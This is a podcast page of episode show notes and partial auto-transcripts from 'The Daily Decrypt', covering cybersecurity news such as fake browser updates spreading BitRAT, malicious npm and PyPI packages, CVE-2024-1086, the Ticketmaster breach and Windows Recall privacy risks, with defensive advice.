The Daily Decrypt The Digital Security Collective
-
- News
“The Daily Decrypt”, hosted by offsetkeyz and d0gesp4n, offers an insightful and approachable take on cybersecurity. Their discussions cover a range of topics, from specific software vulnerabilities to broader issues like mobile security and ransomware trends. They delve into technical details while maintaining accessibility for a general audience, emphasizing practical advice and current developments in the cybersecurity field. The podcast strikes a balance between in-depth analysis and user-friendly content, with a focus on high-quality audio and production.
-
Fake Browser Updates, Atlassian RCE Exploit, glup-debugger-log
In today's episode, we discuss fake browser updates distributing BitRAT and Lumma Stealer via Discord (https://thehackernews.com/2024/06/beware-fake-browser-updates-deliver.html), a malicious npm package targeting Gulp users with a RAT (https://thehackernews.com/2024/06/researchers-uncover-rat-dropping-npm.html), and the high-severity Atlassian Confluence RCE vulnerability (CVE-2024-21683) for which a PoC is now available (https://www.helpnetsecurity.com/2024/06/03/cve-2024-21683-poc/). Tune in to learn about these critical cybersecurity threats and how you can protect your systems.Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/ Logo Design by https://www.zackgraber.com/
Tags:
Browser Updates, Cybersecurity Threat, BitRAT, Lumma Stealer, eSentire, Fake Browser Updates, Discord, Malicious npm Package, Gulp Toolkit, Remote Access Trojans, Software Supply Chain Attacks, CVE-2024-21683, Atlassian Confluence, Remote Code Execution, Cyber Attackers, Cybersecurity Researchers, Downloader Malware, Exploit, Developer Security, Cyber Attack Mitigation
Search Phrases:
How to avoid fake browser updates
BitRAT malware detection
What is Lumma Stealer
Discord used for malware distribution
Malicious npm packages 2024
Latest remote access trojans
CVE-2024-21683 Atlassian Confluence vulnerability
Protect against software supply chain attacks
eSentire cybersecurity report
Remote code execution in Atlassian Confluence
https://thehackernews.com/2024/06/beware-fake-browser-updates-deliver.html
Rise of Fake Browser Updates as Malware Vectors:
Cybercriminals now use fake browser updates to distribute BitRAT and Lumma Stealer malware.
These attacks typically start when users visit compromised websites that redirect them to fraudulent update pages.
Actionable Insight: Avoid downloading updates from unfamiliar sources; always verify the legitimacy of update prompts through official channels.
Discord as a Malware Distribution Platform:
Attackers use Discord to host malicious files, leveraging its widespread use among legitimate users.
Bitdefender found over 50,000 harmful links on Discord in the past six months.
Actionable Insight: Exercise caution when downloading files from Discord and report suspicious links to platform moderators.
Sophisticated Attack Chain Mechanisms:
Attacks involve JavaScript and PowerShell scripts within ZIP files to execute malware.
These scripts load additional payloads disguised as PNG image files, adding a layer of obfuscation.
Actionable Insight: Use advanced endpoint protection that can detect and mitigate script-based attacks.
BitRAT and Lumma Stealer Capabilities:
BitRAT can harvest data, mine cryptocurrency, and take control of infected devices.
Lumma Stealer, available for rent, steals information from web browsers and crypto wallets.
Actionable Insight: Regularly update and patch software, employ strong passwords, and use multi-factor authentication to protect sensitive information.
Emerging Threats: Drive-by Downloads and Malvertising:
Fake browser update attacks often utilize drive-by downloads and malvertising techniques.
Recent campaigns trick users into manually executing malicious PowerShell code under the guise of browser updates.
Actionable Insight: Educate users on the risks of drive-by downloads and ensure robust network defenses are in place.
Lumma Stealer's Growing Popularity:
Lumma Stealer logs for sale increased by 110% from Q3 to Q4 2023, indicating its effectiveness and high success rate.
Actionable Insight: Implement continuous monitoring and threat intelligence to detect and respond to emerging threats promptly.
Exploiting Pirated Software:
Attackers use pirated software and adult game installers to distribute various malware, including Orcus RAT and XMRig miner.
Actionable Insight: Avoid using pirated software and educate users -
Linux Vulnerability Exploits, Ticketmaster Breach, Snowflake Compromise
In today's episode, we cover the critical Linux vulnerability CVE-2024-1086 being actively exploited and urge users to patch immediately (https://arstechnica.com/security/2024/05/federal-agency-warns-critical-linux-vulnerability-being-actively-exploited/). We also discuss the Ticketmaster data breach by the ShinyHunters group, impacting 560 million customers and demanding a £400,000 ransom (https://www.theguardian.com/technology/article/2024/jun/01/live-nation-investigating-data-breach-of-its-us-ticketmaster-unit). Lastly, we delve into potential Snowflake compromises involving stolen customer credentials, with conflicting reports on whether Snowflake itself or its customers were breached (https://www.helpnetsecurity.com/2024/05/31/snowflake-compromised-data-theft/).
Tags:
Linux, Exploited, Kernel, Vulnerability, CVE, Cybersecurity, CISA, ShinyHunters, Ticketmaster, Cybercrime, Data breach, Cybercriminals, Snowflake, Credentials, Security, Privilege escalation
Search Phrases:
How to protect against CVE-2024-1086
Linux kernel vulnerability CVE-2024-1086
ShinyHunters Ticketmaster data breach
Snowflake stolen credentials breach
Cybersecurity measures for Linux vulnerabilities
Protecting against data breaches in Ticketmaster
Cybercrime groups targeting big companies
Escalating privileges in Linux kernel
Preventing credential-based attacks in Snowflake
Recent exploits in cybersecurity 2024
Linux vulnerability being actively exploited
https://arstechnica.com/security/2024/05/federal-agency-warns-critical-linux-vulnerability-being-actively-exploited/
---`Sure thing! Here’s a flash briefing on the Linux vulnerability actively exploited:
Critical Linux Vulnerability Alert:
The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical Linux vulnerability (CVE-2024-1086) to its known exploited vulnerabilities list. [Source: Dan Goodin, Ars Technica]
Severity and Impact:
Severity rating: 7.8 out of 10.
Affected Linux kernel versions: 5.14 through 6.6.
The vulnerability allows privilege escalation, enabling attackers to gain higher system privileges.
Technical Details:
It's a use-after-free error in the NF_tables component of the Linux kernel.
Use-after-free errors can result in remote code execution or privilege escalation.
The bug was patched in January, but many systems remain unpatched.
Exploitation Details:
Exploits allow for a "powerful double-free primitive" when the correct code paths are hit.
Techniques include arbitrary code execution in the kernel and potentially dropping a universal root shell.
Action Required:
CISA mandates federal agencies to patch by June 20.
All affected organizations should update their systems immediately.
Engagement Tips:
Question for Listeners: Have you checked if your systems are running the affected Linux kernel versions?
Call to Action: Update your systems now to prevent potential exploitation.
Feedback Request: Share your experiences with patching critical vulnerabilities on our social media channels.
By keeping these points in mind, you'll ensure your systems are secure and you're up-to-date with the latest cybersecurity threats. Stay safe out there!`
Ticketmaster hit by data hack that may affect 560m customers
https://www.theguardian.com/technology/article/2024/jun/01/live-nation-investigating-data-breach-of-its-us-ticketmaster-unit
---`- Ticketmaster Cyber-Attack: Ticketmaster has experienced a significant data breach, with hackers offering to sell customer data on the dark web. Live Nation, Ticketmaster's parent company, confirmed the breach and is working with forensic investigators and law enforcement to mitigate the risks. [Source: The Guardian]
Ticketmaster hit by data hack that may affect 560m customers
https://www.theguardian.com/technology/article/2024/jun/01/live-nation-investigating-data-breach-of-its-us-ticketmaster-unit---`security.
Snow -
Mystery Malware Destroys 600,000 Routers, and CISOs Under Board Pressure, FlyingYeti Exploits WinRAR Vulnerability
In today’s episode, we explore the FlyingYeti campaign exploited by using a WinRAR vulnerability (CVE-2023-38831) to deliver COOKBOX malware in Ukraine, detailed by Cloudflare’s Cloudforce One: https://thehackernews.com/2024/05/flyingyeti-exploits-winrar.html. Next, we discuss the unprecedented mystery malware attack that destroyed 600,000 routers from ISP Windstream, reported by Black Lotus Labs: https://arstechnica.com/security/2024/05/mystery-malware-destroys-600000-routers-from-a-single-isp-during-72-hour-span/. Finally, we dive into the Trend Micro study on CISOs facing pressure from corporate boards to downplay cyber risk: https://www.cybersecuritydive.com/news/cisos-pressure-boards-downplay-cyber-risk/717497/.
Tags: WinRAR, COOKBOX, FlyingYeti, Cloudflare, cyber warfare, Ukraine, phishing attacks, malware, routers, ISP, threat actor, Trend Micro, CISOs, cyber risks, organizational security
Search Phrases:
WinRAR vulnerability explained
COOKBOX malware detection and removal
FlyingYeti cyber attack details
Cloudflare security advisories
Protecting against phishing attacks
Malware impact on routers
ISP security breach cases
Trend Micro cybersecurity reports
CISO corporate board pressure
Organizational cybersecurity best practices
May31
An unknown threat actor recently unleashed a devastating malware attack that obliterated over 600,000 routers from a single internet service provider in just 72 hours.
Forcing the company to replace all of the affected devices, leaving their patrons in digital darkness.
What the heck happened here and how will we recover from this?
Under mounting pressure from corporate boards, nearly four and five chief information security officers or CSOs are being pushed to downplay the severity of cyber risks.
As revealed by a recent trend micro study..
How can CSOs navigate the pressure from corporate boards while also maintaining robust security posture?
And finally, sometimes I pick stories simply because the name is too good. So flying Yeti is exploiting a WinRAR vulnerability to deliver cookbook malware in Ukraine marking another alarming chapter in Russia, aligned cyber warfare.
You're listening to the daily decrypt..
And just over 72 hour time period malware called Chalubo
Rendered more than 600,000 routers permanently unusable.
All of these routers belonged to a single internet service provider named Windstream.
And this ISP is now forced to replace every single one of these routers.
Now that is not a small task. And a lot of these routers live in rural areas, which would be a long drive for.
ISP technicians to make.
And there were only so many ISP technicians. Out there. Sure they can ship you these routers, but that's going to take a long time because no supply chain is equipped to handle a random 600,000.
Product order.
Overnight. So who knows how long these people will be without internet?
The specific routers that were affected are action tech T 3,200 and Sage com.
And users are reporting a static red light on their routers, which indicates failure.
Wow. Black Lotus labs utilize the census search engine.
To track these affected router models and noted that.
Throughout that 72 hour time period.
There was a 49% drop in connections for these routers. So almost half of these routers on the public internet.
Went offline.
And I had mentioned that a lot of these routers lived in rural areas.
But the spread of this disaster is, is pretty wide and vast because.
This internet service provider provided service specifically to.
Rural areas. And what is out in rural areas, a lot of farming and agriculture. So who knows what sort of impact this will have? Over.
Our food source in the coming months.
' cause even tractors nowadays rely on wifi.
Which is a whole nother wormhole. That I won't get to on this episode, but if you're interested, go ahead and look up John De -
Open Source Tool Defeats Ransomware, StackOverflow users push malicious Python packages, Are you in the 911 S5 botnet?
In today's episode, we explore how cybercriminals exploited StackOverflow to promote the malicious Python package "pytoileur" aimed at cryptocurrency theft (https://thehackernews.com/2024/05/cybercriminals-abuse-stackoverflow-to.html). We also examine the FBI's takedown of the 911 S5 botnet and its massive impact on online fraud and cybercrime (https://krebsonsecurity.com/2024/05/is-your-computer-part-of-the-largest-botnet-ever/). Lastly, we introduce RansomLord, an open-source anti-ransomware tool that leverages DLL hijacking to block ransomware attacks pre-encryption (https://github.com/malvuln/RansomLord).
FBI Botnet: https://www.fbi.gov/investigate/cyber/how-to-identify-and-remove-vpn-applications-that-contain-911-s5-backdoors
00:00 Introduction to Ransomware Defense
01:12 Ransom Lord: A Game Changer
03:55 How to Check for Botnet Infections
06:47 Malicious Python Package Alert
09:19 Conclusion and Final Thoughts
Tags:
Cybercriminals, Python Package Index, pytoileur, cryptocurrency theft, malicious packages, StackOverflow, open source security, botnet, VPN, YunHe Wang, 911 S5, cybersecurity, RansomLord, exploits, vulnerabilities, ransomware protection
Search Phrases:
Cybercriminal infiltration of Python Package Index
pytoileur malicious package on StackOverflow
Cryptocurrency theft using pytoileur
How to protect against malicious Python packages
Largest botnet disguised as VPN service
Arrest of YunHe Wang for cybercrime
911 S5 botnet detection methods
Protecting computers from 911 S5 botnet
RansomLord tool against ransomware
Ransomware vulnerabilities exploited by RansomLord
May30
There is a new proof of concept. Open source tool called ransom Lord.
attacks, the malware that launches ransomware.
In order to defeat it before it can encrypt your files.
I'm a little blown away by this one, but we'll get to that in a sec. How can ransom Lord change the game for ransomware defenders? And what tactics does it use to defeat ransomware?
The largest botnet ever operating under the guise of free VPN services. Has been dismantled with the arrest of its alleged mastermind for orchestrating cyber crimes, totalling billions of dollars in fraudulent losses. How can you check if your computer is part of the nine 11 s5 botnet and what steps can you take to protect yourself in the future?
The Python package index has been infiltrated with a malicious package named PI told earlier. Which has now found to facilitate cryptocurrency theft by leveraging reputable platforms, such as stack overflow. What measures can developers take to protect themselves from being deceived by malicious packages?
Like this one.
You're listening to the daily decrypt. .
Alright. So as defenders, we are constantly thinking about how to defeat ransomware. But I haven't seen much come out other than detection capabilities. So we're still focused on detecting.
Indicators of compromise that might lead to ransomware.
But just yesterday health net security released an article on an open source. Anti ransomware tool that essentially attacks the ransomware malware Using DLL hijacking.
and automates the creation of PE files. Which are used to exploit.
Ransomware before it can encrypt your files.. So even the thought of this type of defense makes me so excited.
The idea that there can be more than just detecting indicators of compromise for ransomware prevention. When we can actually go in and attack the ransomware itself.
And get rid of it before it even has the opportunity to encrypt your files.
It's a breath of fresh air.
So.
This tool, which is free and open source and available on get hub. The link is in the show notes below. Deploys exploits in order to defend the network. Which is a novel strategy for defeating ransomware.
It also uses vulnerability intelligence.
That maps, threats to vulnerable DLLs.
In order to target specific thr -
Harry Coker Jr. Bolsters Security for Critical Infrastructures in Auburn Keynote
In today's episode, we discuss the White House's call for critical cybersecurity assistance for sectors like healthcare and water utilities (https://www.cybersecuritydive.com/news/white-house-seeks-critical-cyber-assistance-for-water-utilities-healthcare/716942/), analyze the compromise of JAVS Viewer software by loader malware (https://www.helpnetsecurity.com/2024/05/23/javs-viewer-malware/), and explore how rising cyberattacks are driving the growth of the cybersecurity industry, affecting companies like AWS, Cisco, and CrowdStrike (https://www.cybersecuritydive.com/news/attacks-fuel-cyber-business/716782/).
Full Coker Speech: https://www.youtube.com/watch?v=1yR3kfajhk0
00:00 Introduction to the Cybersecurity Boom
01:04 The Economics of Cybersecurity
03:22 National Cyber Director's Keynote Highlights
04:14 The Cost of Cybersecurity Measures
05:19 Teenagers in Cybercrime: A Growing Concern
06:13 JAVS Viewer Malware: What You Need to Know
07:50 Conclusion and Call to Action
Tags: Harry Coker Jr, healthcare, water utilities, ransomware, National Cyber Director, critical infrastructure, cyber threats, innovative strategies, cybersecurity, administration initiatives, Lapsus, teenage cybercrime, JAVS, recording software, loader malware, security risks, courtrooms, prisons, compromised software, cybersecurity vendors, digital threat landscape, market complexity
Search Phrases: Initiatives by Harry Coker Jr in cybersecurity Healthcare cyber threat protection strategies Water utilities ransomware defense National Cyber Director's speech on cyber threats Administration measures against teenage cybercrime Compromised JAVS software security risks Immediate actions for JAVS Viewer users Cybersecurity vendors' role in digital threat evolution Increasing complexity in the cybersecurity market Global spending on cybersecurity in 2023
May24
Cyber attacks are propelling the cybersecurity industry to new Heights with global spending on security projected to hit in astonishing. $215 billion this year.
How are cybersecurity vendors adapting to the constant evolution of cyber threats while also contributing to increased complexity in the market?
National cyber director, Harry Coker Jr.
Announced a sweeping initiative to fortify healthcare and water utilities against cyber threats.
Highlighting a commitment to strengthen America's critical infrastructure. At a keynote speech on Wednesday. What measures is the administration taking to deter teenagers from join me, joining cyber criminal groups. Like Lapsis.
Threat researchers have discovered that legitimate recording software from JAVS has been compromised with loader malware directly from the developers own site.
If you're using the jabs viewer, what actions can you take?
If you suspect your version has been compromised.
You're listening to the daily decrypt.
The cybersecurity industry is thriving.
Thanks to the rise in cyber attacks.
Now this makes sense. Supply and demand is the foundation of capitalism.
And cyber attacks are on the rise. So of course, cybersecurity is booming, but this reminds me sort of eerily of the show fallout, which is on Amazon prime, highly recommend one of my favorite TV shows of all time.
But go ahead and skip the next 15 seconds if you don't want any spoilers, but.
One of the most fascinating aspects of that show is how.
Valtech the maker of these volts.
Was one of the top companies in the country.
Because one, they preyed on citizens, fear of a nuclear war. So they made these vaults.
To keep people safe in the impending nuclear bomb drop. But in order to stay on top in order to stay.
Relevant.
They needed that nuke to drop.
And I don't think we're at that point yet with cybersecurity, I believe.
The volume of cyber attacks is enough to sustain a $200 billion industry. But who knows what will happen in 10, 20, 30 years, maybe in ord -
Windows Recall Feature Takes Secret Screenshots, Microsoft President to Testify Before Congress, Disconnect Public Facing ICS Devices
In today's episode, we discuss Microsoft President Brad Smith's upcoming testimony before Congress regarding security shortcomings (source: https://www.cybersecuritydive.com/news/microsoft-president-congressional-hearing/716847/), dive into the privacy concerns surrounding Windows 11's new Recall feature (source: https://www.helpnetsecurity.com/2024/05/22/windows-recall-security-privacy/), and detail Rockwell Automation's advisory on disconnecting internet-facing ICS devices amid rising cyber threats (source: https://thehackernews.com/2024/05/rockwell-advises-disconnecting-internet.html).
00:00 Introducing Windows 11's Recall Feature: A Privacy Concern?
01:11 The Risks and Protections Against Windows 11's Recall Feature
04:44 Microsoft's Response to Security Breaches and Future Plans
06:41 Advisory on Industrial Control SystemsAmid Cyber Threats
07:36 Wrapping Up and How to Stay Connected
Tags List
Microsoft, Brad Smith, Cybersecurity, Congress, Windows, Recall, AI, cybercriminals, Rockwell Automation, Industrial control systems, Cyber threats, Vulnerabilities
Search Phrases
Microsoft cybersecurity measures
Brad Smith congressional testimony
Impact of recent cyberattacks on Microsoft
Security risks of Windows Recall feature
Protecting against cyber intrusions
Rockwell Automation cybersecurity advice
Industrial control systems cyber threats
Geopolitical tensions and cyber vulnerabilities
Scanning for public-facing assets in cybersecurity
Mitigating cyber risks in industrial control systems
may23
Microsoft windows has introduced a new feature in windows 11 powered machines called recall, which takes screenshots of your open applications, every couple of seconds and uses AI to analyze them.
This is obviously stirring fears among security experts who are warning that it could become a goldmine for cybercriminals if misused. How can users protect themselves from these potential security and privacy risks posed by windows. Recall.
Speaking of Microsoft. On June 13th, Microsoft president Brad Smith will face Congress to address a cascade of security failures. That led to their recent cyber intrusions.
And finally Rockwell automation is advising urgent disconnects of internet facing industrial control systems, amid rising cyber threats, linked to geopolitical tensions and exploited vulnerabilities in these ICS devices.
.
What immediate actions can administrators take?
To not only check if their devices are publicly accessible, but also remediate it.
You're listening to the daily decrypt.
Hey, no press is bad. Press.
And today. Microsoft windows is getting a lot of press.
So just recently, Microsoft has introduced a new feature called recall in windows 11. That captures screenshots every few seconds.
And then uses AI.
To search through these screenshots and interact with specific content.
Essentially indexing, everything that you do on your computer.
This could be very useful for those of us like myself who have a terrible memory.
And want to remember what we were just doing. Users can go in and search through the, their history on their computer to see, Hey, what was I doing? 10 minutes ago that I need to continue doing? Sure. Sounds great. You know, who else can search through your whole history? Anyone who's compromised your system. So this feature can be disabled.
Which is great.
You can also specify apps that you want to exclude from this. So if that app is open, it will stop taking screenshots. But what's key to understand is that if you're compromised, an attacker can covertly enable this feature using PowerShell.
And so once they have that enabled, they can just sit back and wait.
For you to do something that jeopardizes your privacy, like entering your social security number.
See what banks you use.
Maybe use those screenshots to extort you, maybe you're doing something you woul